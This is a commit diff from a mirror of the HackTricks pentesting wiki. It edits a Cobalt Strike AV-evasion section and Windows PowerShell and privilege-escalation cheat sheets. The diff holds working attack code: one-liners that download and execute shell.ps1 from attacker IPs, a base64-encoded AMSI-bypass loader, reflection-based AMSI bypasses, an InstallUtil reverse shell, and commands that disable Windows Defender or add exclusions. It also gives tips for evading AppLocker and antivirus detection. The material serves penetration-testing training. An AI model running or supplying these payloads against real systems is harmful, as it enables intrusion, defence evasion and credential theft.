Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-21 20:23:18 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [#3407] No subject

Browse source
This commit is contained in:
CPol 2022-08-18 23:30:34 +00:00 committed by gitbook-bot
parent dc36b843f4
commit a941c12d4f
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
3 changed files with 72 additions and 71 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

30
c2/cobalt-strike.md
View file

@ -171,33 +171,3 @@ beacon> socks 1080
# SSH connection
beacon> ssh 10.10.17.12:22 username password</code></pre>
## Avoiding AVs
### Artifact Kit
Usually in `/opt/cobaltstrike/artifact-kit` you can find the code and pre-compiled templates (in `/src-common`) of the payloads that cobalt strike is going to use to generate the binary beacons.
Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the generated backdoor (or just with the compiled template) you can find what is making defender trigger. It's usually a string. Therefore you can just modify the code that is generating the backdoor so that string doesn't appear in the final binary.
After modifying the code just run `./build.sh` from the same directory and copy the `dist-pipe/` folder into the Windows client in `C:\Tools\cobaltstrike\ArtifactKit`.
```
pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
```
Don't forget to load the aggressive script `dist-pipe\artifact.cna` to indicate Cobalt Strike to use the resources from disk that we want and not the ones loaded.
### Resource Kit
The ResourceKit folder contains the templates for Cobalt Strike's script-based payloads including PowerShell, VBA and HTA.
Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the templates you can find what is defender (AMSI in this case) not liking and modify it:
```
.\ThreatCheck.exe -e AMSI -f .\cobaltstrike\ResourceKit\template.x64.ps1
```
Modifying the detected lines one can generate a template that won't be caught.
Don't forget to load the aggressive script `ResourceKit\resources.cna` to indicate Cobalt Strike to luse the resources from disk that we want and not the ones loaded.

99
windows-hardening/basic-powershell-for-pentesters/README.md
View file

@ -18,14 +18,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
## Default PowerShell locations
```
```powershell
C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
```
## Basic PS commands to start
```bash
```powershell
Get-Help * #List everything loaded
Get-Help process #List everything containing "process"
Get-Help Get-Item -Full #Get full helpabout a topic
@ -36,7 +36,7 @@ Get-Command -Module <modulename>
## Download & Execute
```bash
```powershell
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
@ -48,13 +48,13 @@ $wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1") $r = $wr
### Download & Execute in background with AMSI Bypass
```bash
```powershell
Start-Process -NoNewWindow powershell "-nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA="
```
### Using b64 from linux
```bash
```powershell
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0
powershell -nop -enc <BASE64_ENCODED_PAYLOAD>
```
@ -63,25 +63,25 @@ powershell -nop -enc <BASE64_ENCODED_PAYLOAD>
### System.Net.WebClient
```
```powershell
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
```
### Invoke-WebRequest
```
```powershell
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
```
### Wget
```
```powershell
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
```
### BitsTransfer
```
```powershell
Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
# OR
@ -90,7 +90,7 @@ Start-BitsTransfer -Source $url -Destination $output -Asynchronous
## Base64 Kali & EncodedCommand
```bash
```powershell
kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
PS> powershell -EncodedCommand <Base64>
```
@ -99,7 +99,7 @@ PS> powershell -EncodedCommand <Base64>
By default it is set to **restricted.** Main ways to bypass this policy:
```
```powershell
1º Just copy and paste inside the interactive PS console
2º Read en Exec
Get-Content .runme.ps1 | PowerShell.exe -noprofile -
@ -123,19 +123,19 @@ More can be found [here](https://blog.netspi.com/15-ways-to-bypass-the-powershel
## Constrained language
```bash
```powershell
$ExecutionContext.SessionState.LanguageMode
#Values could be: FullLanguage or ConstrainedLanguage
```
### Bypass
```bash
```powershell
#Easy bypass
Powershell -version 2
```
In current Windows that Bypass won't work but you can use[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM). **To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add _C:\Windows\Microsoft.NET\assembly\GAC\_MSIL\System.Management.Automation\v4.0\_3.0.0.0\\_\_31bf3856ad364e35\System.Management.Automation.dll\_ and **change the project to .Net4.5**.
In current Windows that Bypass won't work but you can use[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM). **To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` and **change the project to .Net4.5**.
#### Direct bypass:
@ -149,11 +149,13 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogTo
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
```
You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass the constrained mode. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).
## AppLockerPolicy
Check which files/extensions are blacklisted/whitelisted.
```
```powershell
Get-ApplockerPolicy -Effective -xml
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$a = Get-ApplockerPolicy -effective
@ -162,7 +164,7 @@ $a.rulecollections
## Enable WinRM (Remote PS)
```bash
```powershell
enable-psremoting -force #This enables winrm
# Change NetWorkConnection Category to Private
@ -178,15 +180,32 @@ Get-NetConnectionProfile |
## Disable Defender
```bash
```powershell
# Check status
Get-MpComputerStatus
Get-MpPreference | select Exclusion* | fl #Check exclusions
# Disable
Set-MpPreference -DisableRealtimeMonitoring $true
#To completely disable Windows Defender on a computer, use the command:
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
# Set exclusion path
Add-MpPreference -ExclusionPath "C:\users\public\documents\magichk"
Set-MpPreference -ExclusionPath "C:\users\public\documents\magichk"
# Check exclusions configured via GPO
Parse-PolFile .\Registry.pol
KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions
ValueName : Exclusions_Paths
ValueType : REG_DWORD
ValueLength : 4
ValueData : 1
KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions\Paths
ValueName : C:\Windows\Temp
ValueType : REG_SZ
ValueLength : 4
ValueData : 0
```
### AMSI bypass
@ -197,7 +216,7 @@ Therefore, the goal of the AMSI bypasses you will are are to **overwrite the ins
**AMSI bypass generator** web page: [**https://amsi.fail/**](https://amsi.fail/)****
```bash
```powershell
# A Method
[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
@ -244,19 +263,19 @@ https://slaeryan.github.io/posts/falcon-zero-alpha.html
## PS-History
```bash
```powershell
Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
```
## Get permissions
```bash
```powershell
Get-Acl -Path "C:\Program Files\Vuln Services" | fl
```
## OS version and HotFixes
```bash
```powershell
[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches
@ -264,20 +283,20 @@ Get-Hotfix -description "Security update" #List only "Security Update" patches
## Environment
```bash
```powershell
Get-ChildItem Env: | ft Key,Value #get all values
$env:UserName @Get UserName value
```
## Other connected drives
```bash
```powershell
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
```
### Recycle Bin
```bash
```powershell
$shell = New-Object -com shell.application
$rb = $shell.Namespace(10)
$rb.Items()
@ -293,14 +312,14 @@ $rb.Items()
## Users
```bash
```powershell
Get-LocalUser | ft Name,Enabled,Description,LastLogon
Get-ChildItem C:\Users -Force | select Name
```
## Secure String to Plaintext
```bash
```powershell
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring
$user = "HTB\Tom"
$cred = New-Object System.management.Automation.PSCredential($user, $pass)
@ -314,7 +333,7 @@ Domain : HTB
Or directly parsing form XML:
```bash
```powershell
$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *
UserName : Tom
@ -325,7 +344,7 @@ Domain : HTB
## SUDO
```bash
```powershell
#CREATE A CREDENTIAL OBJECT
$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass)
@ -349,20 +368,20 @@ $computer = "<hostname>"
## Groups
```bash
```powershell
Get-LocalGroup | ft Name #All groups
Get-LocalGroupMember Administrators | ft Name, PrincipalSource #Members of Administrators
```
## Clipboard
```
```powershell
Get-Clipboard
```
## Processes
```
```powershell
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
```
@ -374,7 +393,7 @@ Get-Service
## Password from secure string
```bash
```powershell
$pw=gc admin-pass.xml | convertto-securestring #Get the securestring from the file
$cred=new-object system.management.automation.pscredential("administrator", $pw)
$cred.getnetworkcredential() | fl * #Get plaintext password
@ -382,7 +401,7 @@ $cred.getnetworkcredential() | fl * #Get plaintext password
## Scheduled Tasks
```bash
```powershell
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
```
@ -390,14 +409,14 @@ Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,Tas
### Interfaces
```
```powershell
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
```
### Firewall
```bash
```powershell
Get-NetFirewallRule -Enabled True
Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block
@ -412,32 +431,32 @@ Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block | Format-Tab
### Route
```
```powershell
route print
```
### ARP
```
```powershell
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
```
### Hosts
```
```powershell
Get-Content C:\WINDOWS\System32\drivers\etc\hosts
```
### Ping
```bash
```powershell
$ping = New-Object System.Net.Networkinformation.Ping
1..254 | % { $ping.send("10.9.15.$_") | select address, status }
```
### SNMP
```
```powershell
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
```

14
windows-hardening/windows-local-privilege-escalation/README.md
View file

@ -362,13 +362,17 @@ Get-MpComputerStatus
Check which files/extensions are blacklisted/whitelisted.
```
```powershell
Get-ApplockerPolicy -Effective -xml
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$a = Get-ApplockerPolicy -effective
$a.rulecollections
```
AppLocker rules applied to a host can also be read from the local registry at `HKLM\Software\Policies\Microsoft\Windows\SrpV2`.
**Useful Writable folders to bypass AppLocker Policy**
```
@ -378,6 +382,14 @@ C:\Windows\Tasks
C:\windows\tracing
```
Commonly trusted [**"LOLBAS's"**](https://lolbas-project.github.io/) binaries can be also useful to bypass AppLocker.
**Poorly written rules could also be bypassed**, like `<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`, you can create a folder called allowed anywhere and it will be allowed.
**DLL enforcement very rarely enabled** due to the additional load it can put on a system, and the amount of testing required to ensure nothing will break. So using DLLs as backdoors will help bypassing AppLocker.
You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass AppLocker. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).
### UAC
UAC is used to allow an **administrator user to not give administrator privileges to each process executed**. This is **achieved using default** the **low privileged token** of the user.\